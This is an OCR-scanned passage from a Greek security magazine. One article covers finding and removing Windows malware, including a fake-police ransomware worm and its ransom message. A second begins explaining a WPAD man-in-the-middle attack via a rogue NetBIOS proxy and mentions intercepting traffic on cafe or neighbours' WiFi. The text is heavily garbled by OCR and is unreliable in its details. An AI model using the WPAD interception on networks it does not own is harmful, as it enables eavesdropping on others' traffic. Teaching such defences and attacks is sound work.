τρέχει κανένα πρὀγραμμα µε auró το ὀνομα -- ὀχι с’ ἑνα υγιὲς σύστη- 
μα Windows. Όπως καταλαβαίνετε, Aoinóv, στην αναζήτηση κακὀβουλων 
προγραμμάτων ισχύει το εξής: Осо πιο καλά γνωρίζει κανεὶς ra npo- 
γράμματα που εκτελούνται опо φυσιολογικἐς συνθήκες, τόσο πιο πολλὲς 
εἶναι οι πιθανότητες να ξεθάψει капого κρυμμένο malware. Κάπως ¿TOI 
προκύπτει ο ακόλουθος χρυσὸς κανόνας: Καλό εἶναι να γνωρίζετε ra 
(βασικὰ) εξαρτήματα του συστήµατος και τα προγράμματα που 
ἐχετε εγκαταστήσει εσεἰς, ὅπως επἰσης ro πὼς ονομάζονται καὶ TO 
που βρίσκονται. 


Па va διευκολύνετε τη ζωή σας, µπορείτε να χρησιµοποιείτε κἄποιο апо 
та freeware εργαλεία που διαχειρίζονται τις εγγραφὲς στην αυτόματη 
εκκίνηση του συστήματος. О γράφων χρησιμοποιεί (και προτείνει) то 


συστήµατος. 
| Starter (р E 
File Edit Configuration Help 
а | а | | [^] B ві Φ | 
Ей Мем Edt Delete | Refresh | Launch Properies| Options | About 
Lig Startups |) Processes | gÈ Services 
Sections ШЕ δ]! Name Value Section E. a Desciipli 
Ўр АП sections (10) СЮ GrooveMoritor "C:\Program Files [485] WMicrosolt OfficeNOfficel 'NarooveMoriltor.exe" | Registry - Machine Вип [Г] GrooveMonitor Utility 
= (gi Startup folders (2) [ui nmapp “C:\Program Files (385) Network Мадіслатарр.ехе" -autorun -nosplash Registry - Machine Run No 
Я Current user Е nmctsth "C:\Program Files [486)VCommon FilesNPure Networks SharedVPlatformnmctsth.exe" | Registry - Machine Run О Ne 
BË All users (2) ΕΙ Update Agent.Ink C:\Program Files (X86) NCOSMOTENIntemet Оп The GoNAutoUpdateSrv.exe. Startup - All Users [ ] Мо COSMOTE Intemet On The G 
8 Default user vmware-tay "C:\Program Files (486) MwareNVMware Workstation vmware-Iray.exe"" Registry - Machine Run [C Ne VMware Tray Process УМиаі 
= (B) Registy (8) [71 £3 WhoIs On My ΜΗ [εἰς CAProgram Files [486] WhalsOnMjWifimywifi exe Startup - All Users [] Ne  mpwii2 
= @ Curentuser(1] 4] E Google Update "CXUsersNhiseasVAppDateNLocalNGoogleNUpdateNGoogleUpdate. еке" йс Registry - User Run [V] Yes Google Installer (Google Upda 
89 Run(l) [vi & KeePass 2 PreLoad "CAProgram Files (485) KeePass Password Safe 2WeePass.exe" -preload Registry - Machine Run [v] Yes KeePass 
g Runünce [v] e VirtualCloneDrive. "CAProgram Files (485) VElaborate BytesNirtualCloneDriveNVCDD aemon. exe" /5 Registry - Machine Run [v] Yes Virtual CloneDrive Daemon (Vi 
Ej 82 Allusers (7) [4| E vmware-tay “C:Program Files (486) WMwareNvMware W'orkstationNvmware-tray. exe"" Registry - Machine Run [v] Yes VMware Tray Process (VMwat 
8 Run(7) 
8 Runünce 
8 RunünceEx 
8 RunSewices 
8 RunSewices. 
в 85 Default user 
8 Run 
8) Runünce 
ΕΙ [8 INI files 
[3 whin 
«I ΠῚ - р 
3196, 15499, 3,08% 
GrooveMonitor Utility / 12.0.6500.5000 / GrooveMonitor Utility / Microsoft Corporation / © 2006 Microsoft Corporation. ΑἹ rights reserved. wf 
ΕΙ 
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zetpundote τα ζιζάνια! 
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File Action View Help 
A 


(3) Task Scheduler (Local) 


Actions 
τι Ас 
4 E Task Scheduler Library Status | Triggers Next Run Time 
а Games MP Scheduled Scan Ready At4:53 πμ every day - at 100 12:00:00 πμ. 27/8/2012 4:53:27 пы 
4 |] Microsoft 189] Create Basic Task... 
b ΤΊ Windows πε Create Task... 
19 Windows Defender opo iik 
p ГЇ Windows Live E 
ПО wPD СЯ Display All Running T... 
[8 Enable All Tasks History 
τ m +| | fj. New Folder... 
General [Triggers | Actions [ Conditions | Settings | History (disabled) X Delete Folder 
Name: MP Scheduled Scan а va 2 
= [8 Refresh 
Location: | WMicrosoftWWindows Defender 
Author: | H нер 
Description: {Scheduled Scan EL M 
gl | > Ru 
| | mi End 
4 Disable 
rt... 
Security options Εχροι 
|| | © Properties 
When running the task, use the following user account: E 
SYSTEM Ж Delete 
Run only when user is logged on H нер 
© Run whether user is logged on or not < 
Starter, anó την CodeStaf (www.softpedia.com/get/Tweak/System-Tweak/ Εικόνα 3 
Starter.shtm1). Όταν ψάχνουμε yia 


malware, πρέπει 
να τσεκάρουµε OTI- 
δήποτε εκτελείται 

. A ‚ А , εκείνη την ώρα 

Ας υποθέσουμε оті о υπολογιστής µας παρουσιάζει παράξενη συµπεριφο- στον υπολογιστή, 


ра κι ὁτι μόλις ανακαλύψαμε µια ὑποπτη εγγραφή, στο registry ἡ στους καθώς κι οτιδήποτε 


Αντιμετώπιση 


καταλόγους αυτόματης εκκίνησης. Σ΄’ аотђ την περίπτωση πρέπει ма aKo- ενδέχεται να εκτε- 
λουθήσουμε τα εξἠς βήματα: λεστεί στο μέλλον. 
Ακριβώς γι΄ αυτό, 

1. Κάνουμε επανεκκίνηση του συστήματος σε Safe Mode (http:// µια βόλτα απὀ τον 
en.wikipedia.org/wiki/Safe mode). Па το σκοπὀ αυτό πατάμε то Task Scheduler 

[F8], αμέσως μετά ro POST rou BIOS και όταν Еєкіма ro boot των KPIVETULGHODGI" 


3 і А A É TT]TI]. 
Windows. Προφανώς, στο μενού nou θα εμφανιστεί πρέπει va £ni- T 


λέξουμµε ro "Safe Mode". 


2. Ανοίγουμε то npóypaupa msconfig (rj ro Starter ἡ ὀποιο ἆλλο χρη- 
σιμοποιούμε) και εντοπἰζουµε τις ὑποπτες εγγραφές. 


З. Σημειώνουμετις θέσεις (ra paths) στις οποίες βρίσκονται ra πιθα- 
vog επικίνδυνα προγράμματα. 


4. Απενεργοποιούμε τη σχετικἠ εγγραφή, χωρίς να τη διαγράψουμε 
εντελώς. Αυτό γιατὶ ενδἐχεται να ἔχουμε κάνει λάθος και να про- 
κειται για κάτι χρήσιμο. 


5. Ανοίγουμε τον Windows Explorer, µεταβαίΐνουμε στις θέσεις που 
σημειώσαμε νωρίτερα και μετακινούμε τα ύποπτα αρχεία σε Kå- 
ποια ἄλλη, ασφαλἠ θέση. Πα παράδειγµα, σε κάποιον κατάλογο 
που φτιάξαμε επἰτηδες, σε κάποιον εξωτερικὀ δίσκο. 


6. Κάνουμε reboot (σε "Normal Mode") κι ελέγχουμε тп συµπεριφο- 
ра του συστήματος. 


7. Αν λειτουργούν όλα φυσιολογικἁ, μπορούμε va διαγράψουμε opi- 
στικἁ τα αρχεία nou εἶχαμε μετακινήσει προηγουμένως, ὁπως και 
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Event Vie Е 
File Action View Нер 
БЕЗЕТ 


ΕΕ] Event Viewer (Local) 
b ΓΦ Custom Views 
а DÈ Windows Logs 
{а Application 
ЕА Security 
E] Setup 
System 
£ Forwarded Events 
b Ё Applications and Services Lo 
(У Subscriptions 


Application Numi 


Source | 
MSSQLSSQLEXPRESS со Open Saved Log... 
MSSQLSSQLEXPRESS 
Winlogon 

Winlogon 
Security-SPP 
Winlogon т 
DiskDoctorService 
AdobeARMservice 
User Profile Service 


Date and Time 
24/4/2012 79645 ци 
24/4/2012 7:2645 μμ 
24/4/2012 7:26:43 ци 
24/4/2012 7:26:43 ци 
24/4/2012 72643 ци 
24/4/20127:26:41 μμ. 
24/4/2012 7:26:41 μμ 
24/4/201272637 ци 
24/4/2012 7:2632 μμ 


"KO Create Custom View... 
Import Custom View... 
Clear Log... 

Filter Current Log... 


(i) Information 
(DInfermation 
Information 
ы 


Properties 
ΒΒ Find... 

fal Save All Events As... 
Attach a Task To this Log... 


Event 4103, Winlogon 


View » 
General [Details 
19) Refresh 
Windows license activation failed. Error 0x00000000. Help » 
Log Name Application [E] Event Properties 
Source: Winlogon Logged: 24/4/2012 7:26:43 μμ T Attach Task To This Event. 
Event ID: 4103 Task Category: None {з Copy » 
Level: Error Keywords: Classic Е Save Selected Events... 
User N/A Computer laptop 8 Refresh 
OpCode: Info 
7 
MereInformation: Event Lo. B Hep i 


Εικόνα 4 

O Event Viewer 
προσφέρει про- 
σβαση σε όλα 

та "κρυμμένα” 
μηνύματα του 
συστήµατος. Ο 
έλεγχος αυτών 
των μηνυμάτων 
εἶναι κουραστικὀς 
(kai λίγο βαρετός), 
αλλά μέσα апо 
αυτή τη διαδικασία 
ενδέχεται να єуто- 
πίσουµε τα ἴχνη 
κάποιου kakóBou- 
λου προγράμματος. 
Εν ολίγοις, o Event 
Viewer αποτελεί 
απαραίτητο єруа- 
λείο ανασκαφής! 
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τις σχετικἐς εγγραφἑὲς στο registry και στους καταλόγους αυτόμα- 
της εκκίνησης. 


8. Κάνουμε µια ακόµα επανεκκίνηση και ελέγχουμε πάλι για ύποπτα 


προγράµµατα που ενδέχεται να ξεκινούν αυτόματα. 


Περιοχἠ εγκατάστασης 


Υπάρχουν μερικὲς τοποθεσίες nou θα λέγαμε бт! αποτελούν δημοφιλείς 
προορισμούς yia то malware. Φυσικά, ¿va κακόβουλο πρὀγραμμα θα 
μπορούσε να αποφύγει τις καθιερωμένες θέσεις και να τρυπὠσει onou- 
δήποτε! Ωστόσο εἶναι χρήσιμο να γνωρίζουμε τις εν λόγω θέσεις, WOTE 
να ξέρουμε anó πού να ξεκινάμε την αναζήτηση κακόβουλου λογισμι- 
койо και, γενικότερα, να ἐχουμε vav συστηματικὀ τρόπο αναζήτησης. 
Το malware, λοιπὸν, τρυπώνει συνήθως στον κατάλογο ὁπου βρίσκονται 
τα αρχεία του λειτουργικού συστήματος (C:\Windows). Μια ἄλλη συνη- 
θισµένη θέση εἶναι ο κατάλογος C:\temp, ο οποίος χρησιμοποιείται апо 
το σύστημα ως προσωρινὸς αποθηκευτικὀς χώρος. BégBaia στα Windows 
Vista και στις μεταγενέστερες εκδόσεις, η εγγραφή σε αυτόν τον KA- 
τἄλογο απαγορεύεται χωρίς τη συγκατάθεση του χρήστη (βλέπε UAC, 
http://en.wikipedia.org/wiki/User Account Control). Ακριβώς γι’ auro, 
то malware καταφεύγει συχνὰ στον κατάλογο С:\Оѕегѕ\<ОЅЕВ-МАМЕ>\ 
АррракачосаїТегр. Αυτὸς ο κατάλογος εἶναι αντίστοιχος του C:\temp, 
алла ανήκει εξ ολοκλήρου στον χρήστη USER-NAME και η εγγραφή εκεἰ 
μέσα επιτρέπεται ελεύθερα, χωρίς την ενεργοποίηση του UAC. Τέλος, αξἰ- 
ζει va αναφέἑρουµε και την περίπτωση ορισμένων εξελιγµένων ζιζανίων, 
τα οποία φροντίζουν να αλλάζουν θέση ἠ/και ὀνομα σε такта χρονικά 
διαστήματα. Αυτό το πετυχαἰνουν µε τη βοήθεια rou Task Scheduler тоу 
Windows. Πα όσους δεν γνωρίζουν, o Task Scheduler εἶναι ἑνα εργαλείο 
που συνοδεύει τα Windows και το onoio επιτρέπει την προγραμματισμένη 
εκτέλεση προγραμμάτων, eire περιοδικἀ εἰτε σε κἀποια δεδομένη χρονικἠ 
στιγμή. Πα παράδειγµα, η αυτόματη λήψη backup των αρχείων συστήμα- 
τος αποτελεἰ µια εργασἰα nou ἐχει ρυθμιστεί µέσα апо τον Task Scheduler. 


zetpundote τα ζιζάνια! 
ri 


аж нин лина наратив уенин О О СО 


[| File Options View Process Find Handle Users Help 


| ні 4| mmo mx ee! 
PID CPU Working Set | Description Company Name ^ | 
1644 2980 K Abel охай | 
1804 3.892 K Adobe Acrobat Update Service Adobe Systems Incorporated 
1288 5340К 
856 4212 К AMD Eemal Events Service Module AMD 
4900 1049 112496 K Google Chrome. Google Inc 
440 002 4508К 
528 074 21904 K 
1860 «001 9.680 K Norton Disk Doctor Service Symantec Corporation 
1320 1.568 К Norton Disk Doctor Service Proxy Corporation 
в ]dum.exe 2196 064 36.896 K Desktop Window Manager Microsoft Corporation 
© eguiexe 3528 002 14.396 K ESET GUI ESET 
[s 7] ekm.exe. 1960 001 85.416 K ESET Service. ESET 
E) “ο explorer exe. 2316 237 76.508 K Windows Explorer. Microsoft Corporation 
Γη п/а 212 OK Hardware Intemupts and ОРСе 
ipointexe 2404 029 15.044 K Point exe. Microsoft Corporation 
в ]lsass.exe : oration 
lem exe 608 4320K 
s "| MsDepSvc.exe 2036 21.328 K Web Deployment Agent Service Microsoft Corporation 
Ἐ | mysald.exe 2656 005 33208K z 


МАРС Contro\OLEDD21BCD3683941BA9C5C1765FD02 
Default 

Мебах akemate desktop 01324 

MinownDlls 

MiownDils32 

MinownDils32 

XSessions VI NBase NamedObjects. 


CPU Usage: 511396 Commit Charge: 33.37% Processes: 88 


Με λἰγα λόγια, то єм λόγω πρὀγραμμα αποτελεί το ισοδύναμο rou Cron 
Daemon, nou διαθέτουν ra συστήµατα Unix. Μπορούμε va βρούμε τον 
Task Scheduler και να ελέγξουμε τις προγραμματισμένες εργασίἰες του, 
ακολουθώντας της εξἠς διαδρομή: Start > Control Panel > ΑΙ! Control 
Panel Items > Administrative Tools > Task Scheduler (βλ. εικὀνα 3). 


Ύποπτες ενδείξεις 


Υπάρχουν ορισμένα προγράµµατα που εμφανίζουν τα крифа μηνύματα 
του λειτουργικού συστήματος. Αυτά τα προγράµµατα, αν και δεν δημι- 
ουργήθηκαν yia την αποκάλυψη rou malware, αποτελούν ιδιαίτερα ҳрђ- 
спра εργαλεία σε αυτἠ τη δουλειά. Ένα τέτοιο εργαλεἰο εἶναι το περίφημο 
Event Viewer (http://en.wikipedia.org/wiki/Event Viewer) και μπορούμε 
να το βρούμε ακολουθώντας την εξἠς διαδρομή: Start Control Panel 
2 All Control Panel Items Administrative Tools > Event Viewer (βλ. 
εικόνα 4). Με rov Event Viewer μπορούμε να βλέπουμε ἁμεσα та апла, 
τα προειδοποιητικἁ μηνύματα, ὁπως και τις αναφορές σφαλμάτων апо 
όλα τα προγράμματα και τις υπηρεσίες του συστήµατος. Όπως φαίνεται 
και στην εικὀνα 4, κάτω апо το Windows Logs υπάρχουν oi катпуорієс 
μηνυμάτων Application, Security και System. Ξεκινώντας λἰγο ανάποδα, 
να πούμε ὁτι сто System ЖХбємж πρέπει να εμφανίζεται καμία αναφορά 
σφαλμάτων. Αν διαπιστώσουμε кат! τέτοιο τότε οφεἰλουμε να то ÕIS- 
ρευνήσουμε ἁμεσα, διότι κἄποιο πρόγραµµα (συνήθως κάποιος driver) 
ενδέχεται va µη συνεργάζεται кала µε ro hardware. Επίσης, ἑνα μήνυμα 
λάθους στην εν λόγω катпуоріа μπορεὶ να σηµαίνει πραγματικἠ βλάβη 
στο hardware. Στην karnyopia Security αναφέρονται όλες οι παρασκηνι- 
ακὲς κινήσεις που πραγματοποιούν ra Windows και οι οποίες σχετίζονται 
µε την ασφάλεια. Екеї για παράδειγµα θα δείτετις συνδέσεις που πραγ- 
ματοποιούνται στο σύστημα (ra login) κ.λπ. Προφανώς, θα πρέπει ма Kol- 
τάξουμε κι εκεἰ μέσα! Στις περισσότερες των περιπτώσεων δεν θα δούμε 
τίποτε περἱεργο. Τέλος, στην катпуоріа Application πρέπει να ρίξουμε то 
μεγαλύτερο βάρος. Едо ενδέχεται να κρύβονται διάφορα ὑποπτα μηνύ- 
рата, ὁπως η αναφορά үа μία επίθεση buffer overrun. Камоміка, πρέπει 
να δίνουμε ібіаїтєрп спнасіа σε ὁλα τα Errors και ra Warnings. Πρόκειται 
yia µια αρκετά κοπιαστικἠ, χρονοβόρα και βαρετή διαδικασία, алла Kå- 


Εικόνα 5 

Από rov Process 
Explorer δεν 
κρύβεται (σχε- 
бду) τίποτα. Με 

τη βοήθειά του 
μπορούμε va тоє- 
κάρουµε єйкоЛла αν 
εκτελείται κἄποιο 
ύποπτο πρόγραµµα 
και, φυσικἀ, να 

το τερματίσουμε 
άμεσα! 


Εικόνα 6 
To βλακώδες worm 
εν δράση ;) 
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ποιες φορὲς εἶναι απαραἰτητη κι ενδέχεται να ευχαριστούμε την καλἠ µας 
τύχη που αποφασίσαμε у’ ασχοληθούμε. 


Εντοπισμὀς και τερματισμὀς 


Ένα πολύτιμο εργαλείο στην αντιμετώπιση του malware εἶναι o Task 
Manager. Апо auróv μπορούμε να δούµε ὁλες τις εργασίες που εκτελού- 
ута! στο παρασκήνιο του συστήματος. Па va τον εµφανίσουμε аркі να 
πατήσουμε το συνδυασμὀ πλήκτρων [CTRL-4Shift--ESC]. Βέβαια πρέπει 
να σημειώσουμε бт! υπάρχει ἑνα πολύ καλύτερο εργαλείο για аот δου- 
λειά, το οποίο διανέμεται δωρεάν. Ауаферораотє στον Process Explorer 
(http://technet.microsoft.com/en-us/sysinternals/bb896653). Аркеї ма 
σας πούμε ὁτι το єм λόγω εργαλείο προτείνεται και апо την ἰδια τη μαμὰ 
Microsoft. 


Αναρωτιέστε NWG εργαζόµαστε µε αυτό то εργαλείο; Στο δίκτυο κυκλο- 
φορούν пара πολλοί οδηγοί χρήσης και µια σχετικἠ περιγραφή θα ξὲ- 
Φευγε απὀ το θέμα µας. Θα σταθούμε рохо σε µια δυνατότητα του про- 
γράμματος, την οποία θεωρούμε ιδιαίτερα εξυπηρετικἠ. Μιλάμε για τη 
δυνατότητα αναζήτησης ενὸς προγράµµατος, ємос DLL ἡ µιας υπηρεσίας 
που τρἐχει στο σύστημα. Ας υποθέσουμε, λοιπὀν, бт! έχουμε εντοπίσει 
ἑνα ύποπτο πρὀγραµμµα στην αυτόματη εκκἰνηση του συστήματος. Па va 
τσεκάρουµε αν εκτελείται ακόµα, арке ма τρἐξουµε τον Process Explorer 
και να πατήσουμε [CTRL+F]. Έτσι, θα avoi&ei ἑνα παράθυρο στο οποίο 
μπορούμε va εισαγάγουµε то ὀνομα (ολόκληρο ἡ ёха τµήµα) του ὑποπτου 
προγράμματος. Όταν πατήσουμε [ENTER], το πρόγραµµα θα πραγµατο- 
ποιήσει τη σχετικἠ αναζήτηση και θα μαρκάρει та ὀποια αποτελέσματα. 
Αν εντοπἰσουμε το ύποπτο πρὀγραμμα, μπορούμε va τερµατίσουµε то 
ἰδιο και όλα ra παρἀγωγὰ του (διεργασίες που ἐχει ξεκινήσει то ἰδιο), 
κάνοντας δεξί κλικ επάνω του και επιλἐγοντας ro Kill Process Tree. Όπως 
αντιλαμβάνεστε, µε αυτή την ενέργεια διακὀπτουµε την εκτέλεση του 
προγράμματος και то απομακρύνουμµε апо τη μνήμη του συστήματος. 
Ωστόσο, то ἰδιο то πρὀγραμμα παραμένει στο δίσκο µας και στην επόμενη 
εκκίνηση rou θα ενεργοποιηθεἰ ξανά. Па να το απομακρύνουμε μόνιμα 
πρέπει να ακολουθήσουμε τη διαδικασία των окто βημάτων, την οποία 
αναφέραμε παραπάνω. 


Το σκουλἠκι του νόμου 


Σχετικἀ πρὀσφατα &kave rnv εμφά- 
vion του ἑνα worm, στο οποίο δό- 
θηκε εσφαλμένα ο χαρακτηρισμὀς 
"ióc της Αστυνομίας”. Πρόκειται για 
ἑνα novnpó worm, то οποίο єука- 
Өіотата στη θέση C:\Windows και 
καλείται αυτόματα апо το registry 
µε то ακόλουθο κλειδί: 


HKEY LOCAL MACHINEV 
SOFTWAREMMicrosoftNWindowsV 
CurrentVersionNRun 


Εφόσον ro worm ενεργοποιηθεί, 
κάθε φορά που ξεκινάει TO σύστη- 
μα εμφανίζεται το σήμα της δίωξης 
ηλεκτρονικού εγκλήματος μαζί µε 
το ακόλουθο μήνυμα: 


zetpundote τα ζιζάνια! 
Αα 


Προσοχή: 


Αυτό ro Δεπουργικό σύστημα µπλοκάρεται λόγω παραθίασης των νόμων της 
Ελλάδας! Σημειώθηκαν οι ακόλουθες παραθάσεις: 


Н IP διεύθυνσή σας είναι ..... Από αυτή την IP διεύθυνση επισκέφτηκαν 1010- 
σελίδες που περιέχουν πορνογραφία, παιδική πορνογραφία, κτηνοθασία και 
Вїа ката των παιδιών. О υπολογιστής σας επίσης περιείκε θίντεο που πε- 
ριλαμθάνει πορνογραφία, біа και παιδική πορνογραφία. Επιπλέον, από το 


ηλεκτρονικό σας ταχυδρομείο αποστέλλονταν μηνύματα µε τη µορφή spam, 
που περιείκαν τρομοκρατική πρόθεση. 


Αυτό то ипдокарісиа του υπολογιστή ἔγινε yia να σταματήσουν οι παράνο- 
μες δραστηριότητές σας. 


Για va δεκλειδώσετε τον υπολογιστή, πρέπει να πληρώσετε πρόστιμο 100 
ευρώ. 


Μπορείτε να πληρώσετε την ποινή µε δύο τρόπους... 


«Λόγω παραβίασης των νόμων της Ελλάδας...», LOL! Πρὀκειται για ἑνα 
εντελώς ανόητο μήνυμα, το οποίο ποντάρει στην ἄγνοια και στο φόβο 
ορισμένων χρηστῶν. Н απάτη αυτού του worm κάνει μπαμ апо χιλιόμε- 
тра. Κατ’ архас, τα ελληνικἁ του θυμίζουν μετάφραση anó ro Google. 
Κανένας ἑλληνας (και πολύ περισσότερο ἄνθρωπος της πληροφορικής) 
δεν θα ἐγραφε κείµενο µε τόσα λάθη. Στο κἀτω-κάτω, αν η δίωξη ηλε- 
ктромікой εγκλήματος εντὀπιζε µια παρανομία, δεν θα προσπαθούσε va 
κλειδώσει τον υπολογιστή του εγκληματία, αλλά va τον συλλάβει. Αν 
κολλήσετε το συγκεκριμένο worm, λοιπὸν, δεν πρέπει να ψαρώσετε οὐτε 
στιγµή! Ακολουθήστε τα окто βήματα που περιγράψαµε νωρίτερα και θα 
ξεμπερδέψετε οριστικἀ. О γράφων αντιμετώπισε το συγκεκριµένο worm Εικόνα 7 
και δεν χρειάστηκε να κάνει restore σε προηγούμενο restore point, ὅπως To ібіо βλακώδες 
εσφαλμένα αναφέρουν διάφορα sites. Τέλος, ката паса πιθανότητα то worm στη μητρική 


εν λόγω worm αποτελεἰ μετάφραση κάποιου ξένου. Πα του λόγου то του γλὠσσα, Τα 
αληθές δείτε την εικὀνα 7. Αγγλικά! 
Νν METROPOLITAN 
Чон ih POLICE 
- 
Attention!!! 
Thu process Р Bra poet, В оба Онч "Л UN ne amd Maro Poire фае ast ην hoe Paesi phar Cop ΠΡΙ, 
Ta ipang vino 6 Фата νότο S podre програми» өн голе шг ρα. Cui ректори, toco aei oder εαν τὸ жүзгө Cb. ο. со 


тагата почни рефе πλ... 
Macessresr arei s жаай span κει sent yop пт pons паара, e suada comi sum] benata malesu. Them Кайын] werra Co stop your най aO. 


to relcae a lock your computer yeu should pay Ehe Time im 


атеш ol Г 100, In the cave of μιας tha руди, the kash Where can I buy Ukash? 
program wil remove Шири! materials бе Берир your koshi Where сап 1 му ukash? sn 
persanal information ds nob qaas анде. ους ο μα Ομ үа Пре] Печ чё Бн рр ӨЙ айа 


You «could pay the borie in lero ways rem 


gary б үза could by Utaaf m Goman of mapecmariets zr Сад Ίλιορα whch 
1) Ραντ through Ukanh hre E kga 
Ute Pa орде neema Rr Dey purpose. (nter E a De space for parmani ad СЫЗ Ou " 
[4 vus iuret mare Ian ез, code, quer aen pra abor another and Pan check С E Руа Ао pu v πμ PPM Ug 
Фастов - (Лл αι ο αι... 
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Skill: . 
intermediate 
Tags: ураа 
- ш LJ 
-in-The-Middle 
| , LL. 


proxy, spoofingz, 
NetBIOS 
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Εικόνα 1 

О єуас апо τους 
δύο πρωταγωνι- 
στὲς του πειράµα- 
TÓG µας: To ανυπο- 
ψίαστο θύμα µε ra 
Windows 7. Στην 
εικόνα φαίνονται 
και τα δικτυακά 
του στοιχεία... 
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Ὅπως θα έπρεπε ма γνωρίζετε, Οἱ εξωγήινοι δεν xouv ανάγκη va форті- 
σουν τις μπαταρίες τους, δεν μετακινούνται απὀ то A сто B αν δεν ипар- 
χει σοβαρὀς λόγος, οὐτε ἐχουν κάποια ἄλλη ανθρώπινη ανάγκη. Έτσι, 
ἑνα editorial σαν εκεἰνο του deltahacker 010 τοὺς φαίνεται ακατανόητο -- 
αν kai ομολογουμένως διασκεδαστικὀ (http://deltahacker.gr/2012/07/11/ 
deltahackere10editorial). Οι εξωγήινοι ασχολούνται µε кабє λογἠς aoñ- 
µαντα πράγματα κι αναλώνονται σε λεπτομέρειες που κανένας άλλος δεν 
θα πρὀσεχε. Έτσι, ο εξωγἠινος της διπλανής πόρτας, δηλαδή ο γράφων, 
πέρασε αρκετὸ χρόνο το καλοκαἰρι μελετώντας την αναπαραγωγἠ ємос 
σχετικἀ νέου malware, µε ro ὀνομα Flame (http://en.wikipedia.org/wiki/ 
Flame (malware)). 


To να μιλάω yia rov εαυτὀ pou σε тріто πρόσωπο εἶναι τουλάχιστον па- 
ράξενο, γι’ αυτὀ και το γυρίζω αµέσως σε прото. 


Αυτό που τράβηξε την προσοχή µου, λοιπὸν, ἧταν бт! то Flame амапара- 
γεται αξιοποιώντας ша ευπάθεια του 2007. Αναφέρομαι στο WPAD MiTM 
attack (http://bit.ly/msupdmitm). Μερικούς μήνες πριν, συζητούσαμε µε 
τον subZraw για το πόσο ἐχουν εξελιχθεἰ та νέα συστήματα και OXO- 
λιάζαμε бт! εἶναι σχεδὸν αδύνατο va προσβληθούν апо µια τόσο xaun- 
λού επιπέδου επίθεση. lloc τα κατάφερνε араує aurr| п μικρἠ φλόγα; О 
προβληματισμὸς µου ἦταν ἑντονος και ξεκίνησα αμέσως ша διεξοδικἠ 
έρευνα γύρω апо το ζήτημα. Μετὰ апо ατελείωτες ὧρες αναζητήσεων και 
μελέτης, οι προσπἀθειὲς µου κατέληξαν σε ενδιαφέροντα αποτελέσμα- 
τα. Το WPAD MiTM attack δεν πέθανε και δεν παροπλίστηκε ποτέ. Εἶναι 
ауто που λέμε και στον πλανήτη µου, alive-and-kicking! Αρκεὶ να σας по 
бт! υπάρχει πλέον και σχετικὀ module yia то Metasploit (www.Metasploit. 
com/modules/auxiliary/server/wpad). Όπως καταλαβαίνετε, η διαπίστωση 
αυτἠ οδήγησε σε χαρὲς και πανηγύρια: Εἶχε παρουσιαστεὶ µια ευκαιρἰα 
για νέες δοκιμὲς και πειραματισμούς :) 


Η θεωρία 


To Web Proxy Auto Discovery (WPAD) αποτελεί µια τεχνολογία που αξιο- 
ποιούν oi web browsers εδώ κι αρκετὀ καιρὸ, προκειµένου va ανακαλύ- 
πτουν αυτόματα την napouoia proxy servers και να μαθαίνουν τις σχετι- 
кёс̧ ρυθμίσεις. Χωρίς να μπούμε σε πολλὲς λεπτομέρειες, θα πούμε μόνο 
бт! υπάρχουν τρεις μέθοδοι για τον εντοπισµὀ των proxy: Αναζήτηση 
μέσω DHCP, μέσω DNS και, τέλος, μέσω NetBIOS (http://bit.ly/wpadie). 
Έτσι, κάθε φορὰ που ζητάμε µια διεύθυνση апо rov browser αυτὸς oTp£- 
φεται αρχικἁ στον ronikó DHCP και του κάνει την εξἠς ερώτηση: “Ξέρεις 
που θα βρω κανέναν καλὸ proxy server, για την τοποθεσία nou μου ζητή- 
σανε;” Ουσιαστικά, о browser ζητάει апо τον DHCP va του υποδείξει kå- 


[5] Wind stei nd.exe E - ini хі 
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ποιον WPAD server. Αν δεν πάρει απάντηση, o browser στρέφεται στους 
DNS και τους κάνει µια παρόμοια ερώτηση: “Γνωρίζετε κανέναν server 
ує то ὀνομα wpad.«dns-suffix»"; Προφανώς, στη θέση του «dns-suffix» 
μπαίνει το domain name της τοποθεσίας που ζητήσαμε апо ro browser. 
Αν αποτύχει κι αυτή η αναζήτηση, ακολουθεί νέα απὀπειρα εντοπισμού 
TOU WPAD server, αυτή τη фора µέσω NetBIOS. Αν και пал! δεν βρεθεὶ 
τίποτα, o browser συνεχίζει χωρίς proxy (Σ.τ.Ε. Και φαντάζομαι бт! λέει 
κάτι σαν «О γουἐλ, уоцат αρ γιου ykóva ντου αμπάουτ ιτ;»). Ωστόσο, 
αν εντοπιστεἰὶ κἄποιος WPAD server, που συνήθως πρὀκειται για τον ἴδιο 
TOV proxy, o browser ζητάει ¿va αρχείο (wpad.dat) µε τα στοιχεία και τις 
ρυθμίσεις του proxy (IP, port κ.λπ.). Όλα αυτά εἶναι апла και κατανοητά. 
Каті δεν πάει кала, ὁμως: NetBIOS εν έτει 2012; Εἶναι δυνατὸν, ἑνας 
σύγχρονος browser, αφού ρωτήσει τον DHCP server κι ακολούθως τους 
name servers, να ασχοληθεὶ και нє то NetBIOS; Κι όμως, εἰναι. 


Ὅπως αντιλαμβάνεστε, η γνώση των παραπάνω οδηγεἰ суєбом auró- 
рата σε µια πονηρἠ σκέψη: Πόσο δύσκολο θα ἦταν να στήσουμε ἑναν 
transparent proxy server, µε NetBIOS name ro WPAD; Το iio μηχάνημα 
θα μπορούσε va τρέχει κι £vav web server, ὥστε να μοιράζει то απαι- 
τούμενο wpad.dat, σε ónoiov browser το ζητά. Προφανώς, κάτι τέτοιο 
δεν εἶναι καθόλου δύσκολο! Όμως noc θα εξασφαλίσουµε бт! то web 
proxy auto discovery εἶναι ενεργοποιημένο στους υπολογιστές TOU δικτύ- 
ou µας; Κανένα πρὀβλημα! Εἶναι ενεργοποιημένο εξ ορισμού :D Με Ліүа 
λόγια, φαίνεται ὁτι εἶναι σχετικά εὐκολο va εισαγάγουµε τον δικὀ µας 
proxy server σε ἑνα &£vo δίκτυο (π.χ. oro hotspot της αγαπημένης σας 
καφετέριας ἡ στο WiFi του αγαπητούὐ σας γείτονα). Με auróv τον τρόπο 
θα μπορούμε να παρακολουθούμε ὁλη τη δικτυακἠ κἰνηση! 


Στην πράξη 


Στον πλανήτη μου, ὁταν ανακαλύπτουμε каті τόσο ενδιαφέρον 8£Aou- 
µε να ro δοκιμάζουμε, να το εφαρμόζουμε στην πράξη και να µαθαἰ- 
νουµε ακόµα περισσότερα! Το ібіо θα κάνω κι εγώ λοιπὸν και то ібіо 
προτείνω να κάνετε κι εσεὶς. Па τη σχετικἠ δοκιμἠ θα χρειαστούν δύο 
